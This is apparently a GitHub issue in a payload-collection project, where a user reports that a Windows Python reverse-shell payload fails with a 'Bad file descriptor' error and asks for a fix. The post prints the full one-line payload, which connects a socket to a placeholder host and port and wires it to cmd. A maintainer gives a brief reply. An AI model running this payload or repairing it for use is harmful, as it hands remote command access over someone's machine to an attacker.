We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hello, I tried to use this payload /windows/python/socket_reverse.json , I ran it on windows, but the payload didn't work, and I got this error :
/windows/python/socket_reverse.json
OSError: [Errno 9] Bad file descriptor
I found same error on Stack Overflow.
the payload code was:
import socket,subprocess,os s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("host",port)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p = subprocess.call("cmd")
I couldn't understand how to fix it, so can you help me out please?
The text was updated successfully, but these errors were encountered:
It's been a minute since i've touched this so i'll look into it
Sorry, something went wrong.
It's been 26 days since you looked into it
No branches or pull requests
Hello,
I tried to use this payload
/windows/python/socket_reverse.json
, I ran it on windows, but the payload didn't work, and I got this error :I found same error on Stack Overflow.
the payload code was:
I couldn't understand how to fix it, so can you help me out please?
The text was updated successfully, but these errors were encountered: